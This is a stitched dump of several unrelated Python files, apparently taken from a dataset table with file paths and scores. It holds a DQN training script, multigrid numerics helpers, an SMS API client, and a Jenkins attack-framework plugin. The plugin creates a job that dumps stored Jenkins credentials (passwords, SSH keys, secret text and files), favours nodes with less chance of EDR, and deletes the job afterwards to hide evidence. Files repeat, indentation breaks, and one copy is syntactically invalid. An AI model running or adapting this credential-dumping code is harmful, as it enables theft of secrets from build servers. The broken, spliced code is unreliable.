        # Get a minibatch of random samples from memory replay table
        loss = player.agent.fit_batch(train_data, verbose=1)
        # Hard-sync the target network after each pass over the buffer.
        player.agent.target_model.set_weights(player.agent.model.get_weights())
        # Loss: fit_batch presumably returns a list of per-batch losses —
        # TODO confirm against DQNAgent.fit_batch.
        avr_loss = sum(loss) / len(loss)
        print(f"{i}: Avarage loss {avr_loss}")
        losses.append(avr_loss)
    player.agent.save_model(file_name=directory + "/agent_model")
print("\n!!!!!!!!! AGENT EXIT !!!!!!!!!!!!\n\n") | agents/plastic_v1/train_offline.py | import argparse
import pickle
import random
from copy import copy
from typing import List
import numpy as np
from hfo import GOAL, IN_GAME, CAPTURED_BY_DEFENSE, OUT_OF_TIME, OUT_OF_BOUNDS
import settings
from agents.utils import ServerDownError, get_vertices_around_ball
from agents.plastic_v1.base.hfo_attacking_player import HFOAttackingPlayer
from agents.plastic_v1.deep_agent import DQNAgent, Transition, MINIBATCH_SIZE
from agents.plastic_v1.actions.simplex import Actions
from agents.plastic_v1.features.plastic_features import PlasticFeatures
from agents.plastic_v1.aux import print_transiction
STARTING_POSITIONS = {"TOP LEFT": (-0.5, -0.7), "TOP RIGHT": (0.4, -0.7),
"MID LEFT": (-0.5, 0.0), "MID RIGHT": (0.4, 0.0),
"BOTTOM LEFT": (-0.5, 0.7), "BOTTOM RIGHT": (0.4, 0.7)}
class Player:
    """Offline-training wrapper bundling the HFO game interface, feature
    extractor, action set and DQN agent for one attacking player."""

    def __init__(self, num_opponents: int, num_teammates: int,
                 port: int = 6000):
        # Game Interface:
        self.game_interface = HFOAttackingPlayer(num_opponents=num_opponents,
                                                 num_teammates=num_teammates,
                                                 port=port)
        # Features Interface:
        self.features = PlasticFeatures(num_op=num_opponents,
                                        num_team=num_teammates)
        # Actions Interface:
        self.actions = Actions(num_team=num_teammates, features=self.features,
                               game_interface=self.game_interface)
        # Agent instance (hyper-parameters fixed here; epsilon anneals
        # from 1 down to final_epsilon):
        self.agent = DQNAgent(num_features=self.features.num_features,
                              num_actions=self.actions.get_num_actions(),
                              learning_rate=0.005, discount_factor=0.99,
                              epsilon=1, final_epsilon=0.001,
                              epsilon_decay=0.99997, tau=0.125)
if __name__ == '__main__':
    # Offline training entry point: replays a pickled transition buffer
    # through the DQN agent for 20 passes and saves the resulting model.
    parser = argparse.ArgumentParser()
    parser.add_argument('--num_opponents', type=int, default=0)
    parser.add_argument('--num_teammates', type=int, default=0)
    parser.add_argument('--dir', type=str, default=None)
    # Parse Arguments:
    args = parser.parse_args()
    num_team = args.num_teammates
    num_op = args.num_opponents
    directory = args.dir
    # Start Player:
    player = Player(num_teammates=num_team, num_opponents=num_op)
    with open(f"{directory}/learn_buffer", "rb") as fp:  # Unpickling
        train_data = pickle.load(fp)
    print(f"TRAIN DATA len={len(train_data)} from {directory};\n"
          f"{train_data[0]}")
    losses = []
    for i in range(20):
        # Get a minibatch of random samples from memory replay table
        loss = player.agent.fit_batch(train_data, verbose=1)
        # Hard-sync the target network after each pass over the buffer.
        player.agent.target_model.set_weights(player.agent.model.get_weights())
        # Loss: fit_batch presumably returns a list of per-batch losses —
        # TODO confirm against DQNAgent.fit_batch.
        avr_loss = sum(loss) / len(loss)
        print(f"{i}: Avarage loss {avr_loss}")
        losses.append(avr_loss)
    player.agent.save_model(file_name=directory + "/agent_model")
print("\n!!!!!!!!! AGENT EXIT !!!!!!!!!!!!\n\n") | 0.605333 | 0.134435 |
import numpy
from numba import autojit
@autojit(nopython=True)
def poisson1d_GS_SingleItr(nx, dx, p, b):
    '''
    Gauss-Seidel method for 1D Poisson eq. with Dirichlet BCs at both
    ends. Only a single iteration is executed. Compiled with numba's
    **autojit** in nopython mode.
    Parameters:
    ----------
    nx: int, number of grid points in x direction (unused here; the
        sweep bound is taken from len(p))
    dx: float, grid spacing in x
    p: 1D array of float, approximated soln. in last iteration
    b: 1D array of float, 0th-order derivative term in Poisson eq.
    Returns:
    -------
    p: 1D array of float, approximated soln. in current iteration
        (updated in place; the endpoints are never touched)
    '''
    # Gauss-Seidel sweep: each update immediately reuses the freshly
    # written p[i-1] (unlike Jacobi, which only reads old values).
    for i in range(1,len(p)-1):
        p[i] = 0.5 * (p[i+1] + p[i-1] - dx**2 * b[i])
    return p
def RMS(p):
    '''
    Return the root mean square of p.
    Parameters:
    ----------
    p: array
    Returns:
    -------
    Root mean square of p
    '''
    # sqrt of (sum of squares divided by the number of elements)
    squared_total = numpy.sum(p**2)
    return numpy.sqrt(squared_total / p.size)
def residual(dx, pn, b, r):
    '''
    Calculate the residual for the 1D Poisson equation.
    Parameters:
    ----------
    dx: float, grid spacing
    pn: 1D array, approximated solution at a certain iteration n
    b: 1D array, the b(x) in the Poisson eq.
    r: 1D array, output buffer; boundary entries are left untouched
       (Dirichlet BCs)
    Return:
    ----------
    The residual r (same array as the input buffer)
    '''
    # Second-order central difference approximation of p''.
    laplacian = (pn[:-2] - 2 * pn[1:-1] + pn[2:]) / dx**2
    r[1:-1] = b[1:-1] - laplacian
    return r
def full_weighting_1d(vF, vC):
    '''
    Transfer a vector on a fine grid to a coarse grid with full weighting
    . The number of elements (not points) of the coarse grid is
    half of that of the fine grid.
    Parameters:
    ----------
    vF: 1D numpy array, the vector on the fine grid
    vC: 1D numpy array, the vector on the coarse grid,
        size(vC) = (size(vF) + 1) / 2
    Output: vC (filled in place)
    '''
    # Endpoints are injected directly (Dirichlet boundaries).
    vC[0], vC[-1] = vF[0], vF[-1]
    # Interior coarse points: 1/4-1/2-1/4 weighted average of the three
    # nearest fine-grid points.
    vC[1:-1] = 0.25 * (vF[1:-3:2] + 2. * vF[2:-2:2] + vF[3:-1:2])
    return vC
def interpolation_1d(vC, vF):
    '''
    Transfer a vector on a coarse grid to a fine grid by linear
    interpolation. The number of elements (not points) of the coarse
    grid is a half of that of the fine grid.
    Parameters:
    ----------
    vC: 1D numpy array, the vector on the coarse grid,
    vF: 1D numpy array, the vector on the fine grid
        size(vF) = size(vC) * 2 - 1
    Output: vF (filled in place)
    '''
    # Coarse values are injected directly at the even fine-grid indices.
    vF[::2] = vC[:];
    # Odd fine-grid indices get the average of their two coarse neighbours.
    vF[1:-1:2] = 0.5 * (vC[:-1] + vC[1:])
return vF | lessons/05_relax/multigrid_helper.py | import numpy
from numba import autojit
@autojit(nopython=True)
def poisson1d_GS_SingleItr(nx, dx, p, b):
    '''
    Gauss-Seidel method for 1D Poisson eq. with Dirichlet BCs at both
    ends. Only a single iteration is executed. Compiled with numba's
    **autojit** in nopython mode.
    Parameters:
    ----------
    nx: int, number of grid points in x direction (unused here; the
        sweep bound is taken from len(p))
    dx: float, grid spacing in x
    p: 1D array of float, approximated soln. in last iteration
    b: 1D array of float, 0th-order derivative term in Poisson eq.
    Returns:
    -------
    p: 1D array of float, approximated soln. in current iteration
        (updated in place; the endpoints are never touched)
    '''
    # Gauss-Seidel sweep: each update immediately reuses the freshly
    # written p[i-1] (unlike Jacobi, which only reads old values).
    for i in range(1,len(p)-1):
        p[i] = 0.5 * (p[i+1] + p[i-1] - dx**2 * b[i])
    return p
def RMS(p):
    '''
    Return the root mean square of p.
    Parameters:
    ----------
    p: array
    Returns:
    -------
    Root mean square of p
    '''
    # sqrt of (sum of squares divided by the number of elements)
    squared_total = numpy.sum(p**2)
    return numpy.sqrt(squared_total / p.size)
def residual(dx, pn, b, r):
    '''
    Calculate the residual for the 1D Poisson equation.
    Parameters:
    ----------
    dx: float, grid spacing
    pn: 1D array, approximated solution at a certain iteration n
    b: 1D array, the b(x) in the Poisson eq.
    r: 1D array, output buffer; boundary entries are left untouched
       (Dirichlet BCs)
    Return:
    ----------
    The residual r (same array as the input buffer)
    '''
    # Second-order central difference approximation of p''.
    laplacian = (pn[:-2] - 2 * pn[1:-1] + pn[2:]) / dx**2
    r[1:-1] = b[1:-1] - laplacian
    return r
def full_weighting_1d(vF, vC):
    '''
    Transfer a vector on a fine grid to a coarse grid with full weighting
    . The number of elements (not points) of the coarse grid is
    half of that of the fine grid.
    Parameters:
    ----------
    vF: 1D numpy array, the vector on the fine grid
    vC: 1D numpy array, the vector on the coarse grid,
        size(vC) = (size(vF) + 1) / 2
    Output: vC (filled in place)
    '''
    # Endpoints are injected directly (Dirichlet boundaries).
    vC[0], vC[-1] = vF[0], vF[-1]
    # Interior coarse points: 1/4-1/2-1/4 weighted average of the three
    # nearest fine-grid points.
    vC[1:-1] = 0.25 * (vF[1:-3:2] + 2. * vF[2:-2:2] + vF[3:-1:2])
    return vC
def interpolation_1d(vC, vF):
    '''
    Transfer a vector on a coarse grid to a fine grid by linear
    interpolation. The number of elements (not points) of the coarse
    grid is a half of that of the fine grid.
    Parameters:
    ----------
    vC: 1D numpy array, the vector on the coarse grid,
    vF: 1D numpy array, the vector on the fine grid
        size(vF) = size(vC) * 2 - 1
    Output: vF (filled in place)
    '''
    # Coarse values are injected directly at the even fine-grid indices.
    vF[::2] = vC[:];
    # Odd fine-grid indices get the average of their two coarse neighbours.
    vF[1:-1:2] = 0.5 * (vC[:-1] + vC[1:])
return vF | 0.84869 | 0.749294 |
import requests
import logging
class kotsms:
    """Minimal client for the kotsms (簡訊王) SMS HTTP API."""

    def __init__(self):
        self.API_URL = "https://api2.kotsms.com.tw/kotsmsapi-2.php"
        self.API_POINT_URL = "https://api.kotsms.com.tw/memberpoint.php"

    def login(self, username, passwd):
        """Store the account credentials used by subsequent API calls."""
        self.USERNAME = username
        # BUG FIX: the password was never stored (a "<PASSWORD>" placeholder
        # had been left in the source, which is not even valid Python).
        self.PASSWORD = passwd

    def sendMsg(self, phone, sms):
        """Send *sms* to *phone*; returns the API status code as a string."""
        self.smslen = len(sms)
        self.PHONE = phone
        self.SMS = sms
        data = {
            "username" : self.USERNAME,
            "password" : self.PASSWORD,
            "dstaddr" : phone,
            "smbody" : sms.encode("big5"),  # API expects a Big5-encoded body
            "dlvtime" : 0
        }
        response = requests.get(self.API_URL, params=data)
        # Query the remaining point balance so responseDecoder can report it.
        points = requests.get(self.API_POINT_URL, params={"username" : self.USERNAME, "password" : self.PASSWORD})
        self.points = int(points.text)
        return self.responseDecoder(response.text)

    def responseDecoder(self, res):
        """Parse a "kmsgid=<code>" API response and log success/failure.

        Negative codes are looked up in the vendor's error table; the raw
        code string is always returned to the caller.
        """
        code = res.split("=")[1].split("\n")[0]
        errorMsg = {
            "-1" : "CGI string error ,系統維護中或其他錯誤 ,帶入的參數異常,伺服器異常",
            "-2" : "授權錯誤(帳號/密碼錯誤)",
            "-4" : "A Number違反規則 發送端 870短碼VCSN 設定異常",
            "-5" : "B Number違反規則 接收端 門號錯誤 ",
            "-6" : "Closed User 接收端的門號停話異常090 094 099 付費代號等",
            "-20" : "Schedule Time錯誤 預約時間錯誤 或時間已過",
            "-21" : "Valid Time錯誤 有效時間錯誤",
            "-1000" : "發送內容違反NCC規範",
            "-59999" : "帳務系統異常 簡訊無法扣款送出",
            "-60002" : "您帳戶中的點數不足",
            "-60014" : "該用戶已申請 拒收簡訊平台之簡訊 ( 2010 NCC新規)",
            "-999959999" : "在12 小時內,相同容錯機制碼",
            "-999969999" : "同秒, 同門號, 同內容簡訊",
            "-999979999" : "鎖定來源IP",
            "-999989999" : "簡訊為空"
        }
        if(int(code) < 0):
            # BUG FIX: the table values are already str on Python 3, so the
            # previous errorMsg[code].decode('utf-8') raised AttributeError.
            msg = u"[錯誤] {} : 點數剩餘 {} : {}".format(code, self.points, errorMsg[code])
            print(msg)
            logging.error(msg)
        else:
            msg = u"[成功] {} : 點數剩餘 {} : 發送至 {} 傳送成功,簡訊長度為 {} 字, 內容為 : 「{}」 。".format(code, self.points, self.PHONE, self.smslen, self.SMS)
            print(msg)
            logging.info(msg)
        return code
return code | kotsms.py | import requests
import logging
class kotsms:
    """Minimal client for the kotsms (簡訊王) SMS HTTP API."""

    def __init__(self):
        self.API_URL = "https://api2.kotsms.com.tw/kotsmsapi-2.php"
        self.API_POINT_URL = "https://api.kotsms.com.tw/memberpoint.php"

    def login(self, username, passwd):
        """Store the account credentials used by subsequent API calls."""
        self.USERNAME = username
        # BUG FIX: the password was never stored (a "<PASSWORD>" placeholder
        # had been left in the source, which is not even valid Python).
        self.PASSWORD = passwd

    def sendMsg(self, phone, sms):
        """Send *sms* to *phone*; returns the API status code as a string."""
        self.smslen = len(sms)
        self.PHONE = phone
        self.SMS = sms
        data = {
            "username" : self.USERNAME,
            "password" : self.PASSWORD,
            "dstaddr" : phone,
            "smbody" : sms.encode("big5"),  # API expects a Big5-encoded body
            "dlvtime" : 0
        }
        response = requests.get(self.API_URL, params=data)
        # Query the remaining point balance so responseDecoder can report it.
        points = requests.get(self.API_POINT_URL, params={"username" : self.USERNAME, "password" : self.PASSWORD})
        self.points = int(points.text)
        return self.responseDecoder(response.text)

    def responseDecoder(self, res):
        """Parse a "kmsgid=<code>" API response and log success/failure.

        Negative codes are looked up in the vendor's error table; the raw
        code string is always returned to the caller.
        """
        code = res.split("=")[1].split("\n")[0]
        errorMsg = {
            "-1" : "CGI string error ,系統維護中或其他錯誤 ,帶入的參數異常,伺服器異常",
            "-2" : "授權錯誤(帳號/密碼錯誤)",
            "-4" : "A Number違反規則 發送端 870短碼VCSN 設定異常",
            "-5" : "B Number違反規則 接收端 門號錯誤 ",
            "-6" : "Closed User 接收端的門號停話異常090 094 099 付費代號等",
            "-20" : "Schedule Time錯誤 預約時間錯誤 或時間已過",
            "-21" : "Valid Time錯誤 有效時間錯誤",
            "-1000" : "發送內容違反NCC規範",
            "-59999" : "帳務系統異常 簡訊無法扣款送出",
            "-60002" : "您帳戶中的點數不足",
            "-60014" : "該用戶已申請 拒收簡訊平台之簡訊 ( 2010 NCC新規)",
            "-999959999" : "在12 小時內,相同容錯機制碼",
            "-999969999" : "同秒, 同門號, 同內容簡訊",
            "-999979999" : "鎖定來源IP",
            "-999989999" : "簡訊為空"
        }
        if(int(code) < 0):
            # BUG FIX: the table values are already str on Python 3, so the
            # previous errorMsg[code].decode('utf-8') raised AttributeError.
            msg = u"[錯誤] {} : 點數剩餘 {} : {}".format(code, self.points, errorMsg[code])
            print(msg)
            logging.error(msg)
        else:
            msg = u"[成功] {} : 點數剩餘 {} : 發送至 {} 傳送成功,簡訊長度為 {} 字, 內容為 : 「{}」 。".format(code, self.points, self.PHONE, self.smslen, self.SMS)
            print(msg)
            logging.info(msg)
        return code
return code | 0.283285 | 0.147187 |
import base64
import os
import random
import re
import string
import time
import xml.sax.saxutils
import requests.exceptions as req_exc
from libs import jenkinslib, quik
from .BasePlugin import BasePlugin, HijackStdOut
class NonCriticalException(Exception):
    """Expected failure that aborts the run but is reported as a plain
    message (printed via HijackStdOut) rather than a stack trace."""
    pass
def xmlescape(data):
    """XML-escape *data*, additionally escaping double quotes.

    saxutils.escape always handles &, < and >; the extra entity map turns
    '"' into "&quot;" so the result is safe inside double-quoted XML
    attribute values. (The entity text had been mangled to a literal '"'
    in this copy of the source, which is not valid Python.)
    """
    return xml.sax.saxutils.escape(data, {'"': "&quot;"})
class DumpCredsViaJob(BasePlugin):
    """Class for managing DumpCredsViaJob SubCommand"""

    # Cached quik templates; never written by the methods visible here —
    # presumably reserved/used elsewhere (TODO confirm before removing).
    template_cache = None
def __init__(self, args):
super().__init__(args)
state = 1
try:
cred = self.args.credentials[0]
server = self._get_jenkins_server(cred)
if not server.can_create_job():
self.logging.fatal(
"%s: Is not a valid Jenkins user with job creation access or unable to access Jenkins server.",
self._get_username(cred),
)
return
# Step 1: Create empty job so we can check permissions and then use it to list available credentials
server.create_job(
self.args.task_name, "<?xml version='1.1' encoding='UTF-8'?><project></project>"
)
state += 1
# Step 2: Use new job to get list of stealable credentials
credential_list = [x for x in server.list_credentials(self.args.task_name) if x["type"]]
if len(credential_list) == 0:
raise NonCriticalException("No credentials were discovered.")
state += 1
# Step 3: Get a list of online jenkins nodes
posix_nodes = []
windows_nodes = []
other_nodes = []
if self.args.node:
if self.args.node_type == "posix":
posix_nodes = [{"name": self.args.node}]
else:
windows_nodes = [{"name": self.args.node}]
else:
nodes = [x for x in server.get_nodes() if not x["offline"]]
if len(nodes) == 0:
raise NonCriticalException("No online nodes were discovered.")
"""
We need to try to divide nodes up by type because our payload will change.
If unknown, chances are it is some flavor of POSIX compatible OS with base64, echo, and cat, so we can
attempt POSIX payload as a last resort if nothing else is available. Also, for some reason master is
not shown on the nodes page so we can't get the architecture. In most cases the master will be posix compliant anyway.
In most cases, if execution on the master is denied, that means there will be more than one slave.
"""
for node in nodes:
if node["architecture"] and "windows" in node["architecture"].lower():
windows_nodes.append(node)
elif (
any(
node["architecture"] and x in node["architecture"].lower()
for x in ["nix", "nux", "bsd", "osx"]
)
or node["name"] == "master"
):
posix_nodes.append(node)
else:
other_nodes.append(node)
state += 1
"""
Step 4: We determine where we are going to try to run this payload and fabricate the payload.
We want to prioritize posix due to less chance of EDR, and more efficient payload design.
We want to pick our execution location in this order posix -> windows -> other.
"""
barrier = "##{}##".format(
"".join(random.choices(string.ascii_letters + string.digits, k=64))
)
job = None
job_type = None
run_nodes = None
if len(posix_nodes) > 0:
job_type = "posix"
run_nodes = posix_nodes
elif len(windows_nodes) > 0:
job_type = "windows"
run_nodes = windows_nodes
elif len(other_nodes) > 0:
job_type = "posix"
run_nodes = other_nodes
else:
raise NonCriticalException("No nodes to execute on.")
job = self._generate_job_xml(job_type, run_nodes, barrier, credential_list)
state += 1
"""
Step 5: Reconfigure the job payload with actual credential dumping
"""
server.reconfig_job(self.args.task_name, job)
state += 1
"""
Step 6: Start the job
"""
server.build_job(self.args.task_name)
"""
Step 7: Wait for the Results
"""
while True:
time.sleep(3)
try:
results = server.get_build_info(self.args.task_name, "lastBuild")
break
except jenkinslib.JenkinsException:
pass
while results["building"]:
time.sleep(3)
results = server.get_build_info(self.args.task_name, "lastBuild")
if results["result"] != "SUCCESS":
raise NonCriticalException(
"Credential Dumping Build did not complete successfully."
)
state += 1
"""
Step 8: Retrieve Credentials
"""
result = server.get_build_console_output(
"job/" + self.args.task_name + "/", "lastBuild"
)
state += 1
"""
Step 9: Parse Results
"""
# Normalize extract base64 encoded credentials:
try:
result = "\n".join(x for x in result.split("\n") if not x.startswith("+ "))
result = (
re.findall(
r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----",
result,
re.M | re.S,
)[0]
.replace("\r", "")
.replace("\n", "")
)
result = base64.b64decode(result).decode("utf8")
except Exception:
raise NonCriticalException("Unable to parse out credentials from job.")
result = re.split(re.escape(barrier), result, re.M)[1:]
for i, raw_cred in enumerate(result):
raw_cred = raw_cred.replace("\r", "\n").replace("\n\n", "\n")
raw_cred = re.split(r"[\r\n]", raw_cred, re.M)[1:]
try:
if raw_cred[0].strip() == "PASSWORD":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
username = raw_cred[2].split(":")[0].strip()
password = ":".join(raw_cred[2].split(":")[1:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Username:", username)
print("Password:", password)
elif raw_cred[0].strip() == "SSHKEY":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
username = raw_cred[2].strip()
passphrase = raw_cred[3].strip()
key = "\n".join(raw_cred[4:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Username:", username)
print("Passphrase:", passphrase)
print("Key:")
print(key)
elif raw_cred[0].strip() == "SECRETTEXT":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
text = raw_cred[2].strip()
print("Type:", cred_type)
print("Description:", description)
print("Text:", text)
elif raw_cred[0].strip() == "SECRETFILE":
if (
raw_cred[2] == ""
): # Delete blank line if it exists at top of file which was introduced by regex splitting
del raw_cred[2]
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
file_content = "\n".join(raw_cred[2:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Content:")
print(file_content)
except Exception:
pass
if i < (len(result) - 1):
print(
"-----------------------------------------------------------------------------"
)
except jenkinslib.JenkinsException as ex:
if "[403]" in str(ex).split("\n")[0]:
self.logging.fatal(
"%s authentication failed or no access", self._get_username(cred)
)
else:
self.logging.fatal(
"Unable to access Jenkins at: %s With User: %s For Reason:\n\t%s"
% (
(
self.server_url.netloc
if len(self.server_url.netloc) > 0
else self.args.server
),
self._get_username(cred),
str(ex).split("\n")[0],
)
)
except (req_exc.SSLError, req_exc.ConnectionError):
self.logging.fatal(
"Unable to connect to: "
+ (self.server_url.netloc if len(self.server_url.netloc) > 0 else self.args.server)
)
except NonCriticalException as ex:
with HijackStdOut():
print(str(ex))
except Exception:
self.logging.exception("")
exit(1)
finally:
# Do Cleanup
if state > 1:
try:
server.delete_job(self.args.task_name)
return
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
with HijackStdOut():
print(
"WARNING: Unable to delete the job, attempting secondary clean-up. You should double check."
)
# We were unable to delete the the task, so we need to do secondary clean-up as best we can:
# First we delete all console output and run history:
try:
server.delete_all_job_builds(self.args.task_name)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to clean-up console output. You should definitely try to do this yourself."
)
# Second, overwrite the job with an empty job:
try:
server.reconfig_job(
self.args.task_name,
"<?xml version='1.1' encoding='UTF-8'?><project></project>",
)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to wipeout job to hide the evidence. You should definitely try to do this yourself."
)
# Third, attempt to disable the job:
try:
server.disable_job(self.args.task_name)
except (
jenkinslib.JenkinsException,
req_exc.SSLError,
req_exc.ConnectionError,
req_exc.HTTPError,
):
print(
"WARNING: Unable to disable job. You should definitely try to do this yourself."
)
    def _generate_job_xml(self, job_type, nodes, barrier, credentials):
        """Render the Jenkins job XML that dumps *credentials*.

        WARNING: the quik templates are rendered with ``locals()``, so the
        local variable names here (file_name, barrier, credentials,
        bindings, cmds, ...) are part of the template contract — do not
        rename them.
        """
        file_name = "f" + "".join(random.choices(string.ascii_letters + string.digits, k=8))
        loader = quik.FileLoader(os.path.join("data", "xml"))
        bindings_template = loader.load_template("credential_binding_template.xml")
        job_template = loader.load_template("job_template.xml")
        # Pick the payload script matching the target OS family.
        if job_type == "posix":
            cmd_template = quik.FileLoader(os.path.join("data", "bash")).load_template(
                "posix_job_dump_creds_template.sh"
            )
        else:
            cmd_template = quik.FileLoader(os.path.join("data", "batch")).load_template(
                "windows_job_dump_creds_template.bat"
            )
        # Assign the environment-variable names each credential binding uses.
        for i in range(len(credentials)):
            if credentials[i]["type"] == "SSHKEY":
                credentials[i]["key_file_variable"] = "a{0}k".format(i)
                credentials[i]["username_variable"] = "a{0}u".format(i)
                credentials[i]["passphrase_variable"] = "a{0}p".format(i)
            else:  # For now everything else uses only one variable
                credentials[i]["variable"] = "a{0}".format(i)
        bindings = bindings_template.render(locals())
        cmds = cmd_template.render(locals())
        return job_template.render(
            {
                "job_type": "BatchFile" if job_type == "windows" else "Shell",
                "assigned_nodes": "({})".format(
                    xmlescape(" || ".join(['"{}"'.format(x["name"]) for x in nodes]))
                ),
                "commands": xmlescape(cmds),
                "credential_bindings": bindings,
            }
        )
class DumpCredsViaJobParser:
    """Argument-parsing mixin for the DumpCredsViaJob sub-command."""

    def cmd_DumpCredsViaJob(self):
        """Handles parsing of RunCommand Subcommand arguments"""
        self._create_contextual_parser(
            "DumpCredsViaJob",
            "Dump credentials via explicit enumeration of shared credentials in a job (Only requires job creation permissions and some shared credentials)",
        )
        self._add_common_arg_parsers()
        self.parser.add_argument(
            "-N",
            "--node",
            metavar="<Node>",
            help="Node to execute against. If specified, you must also pass -T",
            action="store",
            dest="node",
            required=False,
        )
        self.parser.add_argument(
            "-T",
            "--nodetype",
            metavar="<Node Type>",
            help='Node Type, either: "posix" or "windows". If specified, you must also pass -N',
            choices=["posix", "windows"],
            dest="node_type",
            required=False,
        )
        self.parser.add_argument(
            metavar="<Task Name>",
            help="Task to Create, must be unique (may not be deleted if user doesn't have job deletion permissions, so pick something that blends in)",
            action="store",
            dest="task_name",
        )
        args = self.parser.parse_args()
        self._validate_server_url(args)
        self._validate_output_file(args)
        # Task name: alphanumeric plus '/' for sub-folder paths only.
        if not args.task_name or any(
            x not in (string.ascii_letters + string.digits + "/") for x in args.task_name
        ):
            with HijackStdOut():
                self.parser.print_usage()
                print(
                    "\nError: Task Name must be alphanumeric string with optional subfolder pathing via forward slashes."
                )
                exit(1)
        # -N and -T must be given together (or not at all).
        if (args.node and not args.node_type) or (args.node_type and not args.node):
            with HijackStdOut():
                self.parser.print_usage()
                print("\nError: You must either specify both Node and Node Type or neither")
                exit(1)
return self._handle_authentication(args) | libs/JAF/plugin_DumpCredsViaJob.py | import base64
import os
import random
import re
import string
import time
import xml.sax.saxutils
import requests.exceptions as req_exc
from libs import jenkinslib, quik
from .BasePlugin import BasePlugin, HijackStdOut
class NonCriticalException(Exception):
pass
def xmlescape(data):
return xml.sax.saxutils.escape(data, {'"': """})
class DumpCredsViaJob(BasePlugin):
"""Class for managing DumpCredsViaJob SubCommand"""
template_cache = None
def __init__(self, args):
super().__init__(args)
state = 1
try:
cred = self.args.credentials[0]
server = self._get_jenkins_server(cred)
if not server.can_create_job():
self.logging.fatal(
"%s: Is not a valid Jenkins user with job creation access or unable to access Jenkins server.",
self._get_username(cred),
)
return
# Step 1: Create empty job so we can check permissions and then use it to list available credentials
server.create_job(
self.args.task_name, "<?xml version='1.1' encoding='UTF-8'?><project></project>"
)
state += 1
# Step 2: Use new job to get list of stealable credentials
credential_list = [x for x in server.list_credentials(self.args.task_name) if x["type"]]
if len(credential_list) == 0:
raise NonCriticalException("No credentials were discovered.")
state += 1
# Step 3: Get a list of online jenkins nodes
posix_nodes = []
windows_nodes = []
other_nodes = []
if self.args.node:
if self.args.node_type == "posix":
posix_nodes = [{"name": self.args.node}]
else:
windows_nodes = [{"name": self.args.node}]
else:
nodes = [x for x in server.get_nodes() if not x["offline"]]
if len(nodes) == 0:
raise NonCriticalException("No online nodes were discovered.")
"""
We need to try to divide nodes up by type because our payload will change.
If unknown, chances are it is some flavor of POSIX compatible OS with base64, echo, and cat, so we can
attempt POSIX payload as a last resort if nothing else is available. Also, for some reason master is
not shown on the nodes page so we can't get the architecture. In most cases the master will be posix compliant anyway.
In most cases, if execution on the master is denied, that means there will be more than one slave.
"""
for node in nodes:
if node["architecture"] and "windows" in node["architecture"].lower():
windows_nodes.append(node)
elif (
any(
node["architecture"] and x in node["architecture"].lower()
for x in ["nix", "nux", "bsd", "osx"]
)
or node["name"] == "master"
):
posix_nodes.append(node)
else:
other_nodes.append(node)
state += 1
"""
Step 4: We determine where we are going to try to run this payload and fabricate the payload.
We want to prioritize posix due to less chance of EDR, and more efficient payload design.
We want to pick our execution location in this order posix -> windows -> other.
"""
barrier = "##{}##".format(
"".join(random.choices(string.ascii_letters + string.digits, k=64))
)
job = None
job_type = None
run_nodes = None
if len(posix_nodes) > 0:
job_type = "posix"
run_nodes = posix_nodes
elif len(windows_nodes) > 0:
job_type = "windows"
run_nodes = windows_nodes
elif len(other_nodes) > 0:
job_type = "posix"
run_nodes = other_nodes
else:
raise NonCriticalException("No nodes to execute on.")
job = self._generate_job_xml(job_type, run_nodes, barrier, credential_list)
state += 1
"""
Step 5: Reconfigure the job payload with actual credential dumping
"""
server.reconfig_job(self.args.task_name, job)
state += 1
"""
Step 6: Start the job
"""
server.build_job(self.args.task_name)
"""
Step 7: Wait for the Results
"""
while True:
time.sleep(3)
try:
results = server.get_build_info(self.args.task_name, "lastBuild")
break
except jenkinslib.JenkinsException:
pass
while results["building"]:
time.sleep(3)
results = server.get_build_info(self.args.task_name, "lastBuild")
if results["result"] != "SUCCESS":
raise NonCriticalException(
"Credential Dumping Build did not complete successfully."
)
state += 1
"""
Step 8: Retrieve Credentials
"""
result = server.get_build_console_output(
"job/" + self.args.task_name + "/", "lastBuild"
)
state += 1
"""
Step 9: Parse Results
"""
# Normalize extract base64 encoded credentials:
try:
result = "\n".join(x for x in result.split("\n") if not x.startswith("+ "))
result = (
re.findall(
r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----",
result,
re.M | re.S,
)[0]
.replace("\r", "")
.replace("\n", "")
)
result = base64.b64decode(result).decode("utf8")
except Exception:
raise NonCriticalException("Unable to parse out credentials from job.")
result = re.split(re.escape(barrier), result, re.M)[1:]
for i, raw_cred in enumerate(result):
raw_cred = raw_cred.replace("\r", "\n").replace("\n\n", "\n")
raw_cred = re.split(r"[\r\n]", raw_cred, re.M)[1:]
try:
if raw_cred[0].strip() == "PASSWORD":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
username = raw_cred[2].split(":")[0].strip()
password = ":".join(raw_cred[2].split(":")[1:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Username:", username)
print("Password:", password)
elif raw_cred[0].strip() == "SSHKEY":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
username = raw_cred[2].strip()
passphrase = raw_cred[3].strip()
key = "\n".join(raw_cred[4:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Username:", username)
print("Passphrase:", passphrase)
print("Key:")
print(key)
elif raw_cred[0].strip() == "SECRETTEXT":
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
text = raw_cred[2].strip()
print("Type:", cred_type)
print("Description:", description)
print("Text:", text)
elif raw_cred[0].strip() == "SECRETFILE":
if (
raw_cred[2] == ""
): # Delete blank line if it exists at top of file which was introduced by regex splitting
del raw_cred[2]
cred_type = raw_cred[0].strip()
description = raw_cred[1].strip()
file_content = "\n".join(raw_cred[2:]).strip()
print("Type:", cred_type)
print("Description:", description)
print("Content:")
print(file_content)
